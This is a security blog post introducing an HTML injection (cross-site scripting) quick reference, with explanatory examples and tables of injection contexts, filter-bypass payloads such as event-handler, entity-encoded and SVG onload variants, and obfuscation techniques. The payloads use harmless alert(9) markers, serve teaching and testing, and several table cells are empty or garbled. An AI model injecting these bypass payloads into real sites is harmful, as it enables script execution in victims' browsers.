Friends, Romans, visitors, lend me your eyes. I’ve added an HTML injection quick reference (HIQR) to the site. It’s not in iambic pentameter, but there’s a certain rhythm to the placement of quotation marks, less-than signs, and alert() functions.
For those unfamiliar with HTML injection (or cross-site scripting in the vulgate), it’s a vulnerability that enables an attacker to modify a page in order to affect the behavior of a victim’s browser. As the name suggests, the attacker injects markup or JavaScript, usually via a form field or querystring parameter, into a string that is then re-displayed by the app. In the worst cases, the app delivers malicious content to anyone who visits the infected page. Insecure string concatenation is the most common programming error that leads to this flaw.
Imagine an app that permits users to write tags in posts to show off cute pictures of spiders. The app expects users to add images with src attributes that point anywhere on the web. For example,
<img src="http://web.site/image.png">
Were users of the app to limit themselves to nicely formed http: or https: schemes, all would be well in the world. However, there’s already trouble brewing in the form of javascript: schemes. For example, a malicious user could inject arbitrary JavaScript into the page — a dangerous situation considering the JavaScript will be executing within the Same Origin Policy of the web app.
<img src="javascript:alert(9)">
Then there’s the trouble with attributes. Even if the site restricted schemes to http: or https: a (not-at-all) devious hacker could add an inline event handler, for example,
<img src="http://&">
Now the attacker has two ways of executing JavaScript in their victim’s browsers — javascript: schemes and event handlers.
There’s more. Suppose the app writes anything the user submits into the web page. We’ll even imagine that the app’s developers have decided to enforce an http: or https: scheme and they only allow visitors to define a src value. In order to be more secure, the web app writes the src value into an element that’s guaranteed to not have any event handlers. This is where string concatenation rears its ugly, insecure head. For example, the hacker submits the following src attribute:
http:">alert(9)
The app pops this value into the src attribute and, presto!, a new element appears. Notice the two characters at the end of the line, “>, these were the intended end of the src attribute and tag, which were subverted by the hacker’s payload:
<img src="http:">alert(9)>">
HTML injection attacks become increasingly complex depending on the context where the payload is rendered, the characters that are stripped or escaped by data validation filters, the patterns used to detect malicious payloads, and the encoding of the payloads and the page. Check out chapter 2 of HWA for more background on these situations.
You’ll find more info on this blog in articles with an “html injection” category or tag.
SPQR (Senātus Populusque Rōmānus) was the Latin abbreviation used to refer to the collective citizens of the Roman empire. Read up on HTML injection and you’ll become SPQH (Senātus Populusque Haxxor) soon enough.
Mike Shema, Deadliest Web Attacks The latest revision is at https://mutantzombie.github.io/HIQR/hiqr.html
Table 1: Injection Techniques for Various Parsing Contexts
Table 2: Payload Crafting Techniques to Bypass Filters and Data Validation
Table 3: JavaScript Compositions for Manipulation & Obfuscation
| Context | State | Injection Example |
|---|---|---|
| Data State (Text node, open tag) |
</element>--> ]]> |
Welcome back, <script>☣</script>... <title>Search Results for ‘</title>☣‘ <-- lorem ipsem--><script>☣<script>--> <FOO><![CDATA[]]><script>☣</script>]]> |
| Attribute value |
Unquoted Single-quoted |
|
| JavaScript variable assignment |
Unquoted Single-quoted |
(blog post) |
| JavaScript Window.location object property .hash .href .pathname .search |
URL
|
|
1 The biohazard symbol (U+2623) – ☣ – in each example represents a JavaScript payload. It could be anything from a while loop to DoS the browser, e.g. var a;while(1){a+=“a”} to the ubiquitous alert(9). These categories focus on the placement of the payload within the rendered document rather than the effect of the payload.
Though it seems daunting to review the HTML5 syntax specification, doing so aids in understanding how HTML is supposed to be formed. HTML5 defines an explicit algorithm for parsing HTML documents. Read through the spec to become familiar with the expectations of Unicode code points, parse errors, and decisions a User Agent may make when dealing with markup. A standardized approach to parsing is supposed to minimize the quirks and differences among browsers, thus removing a historical source of insecurity. The HTML4 spec was not as clear or as rigourous on parsing.
2 Sometimes it’s helpful to insert a space before the –> to ensure the tag is interpreted. [ HTML5 comments ]
3 This is a quirk of jQuery’s design choice for overloading the $() API to accept selectors or elements. Read about the interplay of JavaScript and Content Security Policy on the blog.
| Concept | Notes | Payload Example |
|---|---|---|
| Alternate attribute delimiters |
Foward slash Dangling quoted string CRLF instead of space |
<img/src=""onerror=alert(9)> <a'' href'' onclick=alert(9)>foo</a> <a"" href=""onclick=alert(9)>foo</a> <img%0d%0asrc=""%0d%0aonerror=alert(9)> |
| HTML entity encoding |
JavaScript scheme (Decimal, hex, unicode) |
<a href="javascript:alert(9)">foo</a> <a href="javascript:alert(9)">foo</a> <a href="javascript:alert(9)">foo</a> |
| JavaScript inline event handlers html4 or html5 |
Unquoted Double-quoted Single-quoted HTML5 autofocus | <input type=text name=foo value=a%20onchange=alert(9)> <input type="text" name="foo" value=""onmouseover=alert(9)//"> <input type='text' name='foo' value=''onclick=alert(9)//'> <input type="text" name="foo" value=""autofocus/onfocus=alert(9)//"> |
| Data URI handlers | src & href attributes Base64 data Alternate |
|
| Alternate markup |
SVG | <svg onload="javascript:alert(9)" xmlns="http://www.w3.org/2000/svg"></svg> <svg xmlns="http://www.w3.org/2000/svg"> <g onload="javascript:alert(9)"></g></svg> <svg><script xlink:href=data:,alert(9)></script> <svg xmlns="http://www.w3.org/2000/svg"> <a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="javascript:alert(9)"> <rect width="1000" height="1000" fill="white"/></a></svg> |
| Untidy markup |
Missing greater-than sign Recover from syntax error Uncommon syntax Orphan entity Vestigal attribute |
|
| Anti-regex patterns |
Element closed prematurely Element confusion Quote confusion Quote confusion with element Quote mixing with element Recursive elements Repeated attributes (match last occurence) |
|
1 HTML5’s Content Security Policy headers can neutralize these attacks by preventing the User Agent from executing JavaScript within this context unless the page author is forced to include the “unsafe-inline” directive.
2 The basic format is dataurl := “data:” [ mediatype ] [ “;base64” ] “,” data. The scheme is defined in RFC 2397.
3 Per HTML5 spec, “When the user agent leaves the attribute name state (and before emitting the tag token, if appropriate), the complete attribute’s name must be compared to the other attributes on the same token; if there is already an attribute on the token with the exact same name, then this is a parse error and the new attribute must be dropped, along with the value that gets associated with it (if any).”
| Technique | Notes | Example |
|---|---|---|
| Concatenation | String operators Locigal operators Mathematical operators |
|
| Function execution | Anonymouns Method lookup |
|
| Strings | String object Regex object source attribute |
|
| Harness function from a JavaScript library | Angular Ember JS jQuery Prototype Underscore |
|
| Type coercion |
|
|